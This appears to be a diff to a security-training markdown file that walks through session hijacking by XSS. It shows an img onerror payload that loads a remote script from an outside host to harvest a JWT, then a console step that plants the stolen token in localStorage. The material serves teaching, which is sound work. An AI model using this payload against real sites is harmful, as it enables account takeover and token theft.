robinsillem/SecurityTraining/Attacks/Session hijacking via XSS.md

     <img src="///" onerror="a = document.createElement('script'); a.src = 'http://10.10.10.30/exploits/jwt.js'; document.head.appendChild(a);" />

-To hijack the session, open up a console in another browser and enter in,
+To hijack the session, put your attacker hat on, start the app in another browser window, open up a console and enter in,

     localStorage["ls.currentUser"] = JSON.stringify( your harvested JWT )